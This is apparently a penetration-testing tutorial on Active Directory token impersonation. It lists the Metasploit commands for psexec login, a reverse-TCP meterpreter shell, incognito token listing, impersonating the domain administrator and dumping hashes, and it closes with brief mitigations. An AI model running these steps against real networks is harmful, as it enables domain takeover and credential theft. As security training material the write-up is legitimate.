Token Impersonation: AD Post Compromise Attack
Overview
What are tokens?
- Temporary keys that allow you access to a system/network without having provide credentials each time you access a file. Think cookies for computers.
Two types:
- Delegate- Created for logging into a machine or using Remote Desktop.
- Impersonate- “non-interactive” such as attaching a network drive or a domain logon script.
Steps:
Pop a shell and load incognito
Impersonate our domain user
Attempt to dump hashes as non-Domain Admin
ALRIGHT, BUT WHAT IF A DOMAIN ADMIN TOKEN WAS AVAILABLE?
Identify Domain Administrator
Impersonate our Domain Administrator
Attempt to dump hashes as Domain Admin…
WIN!
Token Impersonation with Incognito
So to perform this attack, firstly we have to start up the Metasploit.
Command: msfconsole
Now we will use psexec in metasploit.
Command: use exploit/windows/smb/psexec
Now we will set options according to our attack.
set rhosts <target IP>
set smbdomain <domain>
set smbpass <password>
set smbuser <user>
Now we will type “show targets”
and set it to Native upload by typing “set target 2”.
Now we will check the targets and then we will set the payload.
Command: set payload windows/x64/meterpreter/reverse_tcp
Now we will set lhost,
Command: set lhost eth0
Now we will type “run” and hit enter and now we have got the meterpreter shell.
Now we will load Incognito.
Command: load incognito
Now by typing “help” we can use these commands:
Now we will list tokens of user:
Command: list_tokens -u
Here we can see the administrator, so now we will impersonate the token of administrator.
Command: impersonate_token marvel\\administrator
Now we will type “shell” and hit enter then we will get a shell of that machine and we are administrator now.
But here is a problem. If you will exit out from the shell and execute the command hashdump then it will give an error. So, to solve this error, we will execute a command that will take us back to the initial step from where we entered the machine.
Command: rev2self
Mitigation Strategies
- Limit user/group token creation permissions.
- Account tiering
- Local admin restriction
If you liked this writeup then you can connect with me on Linked_in or Instagram.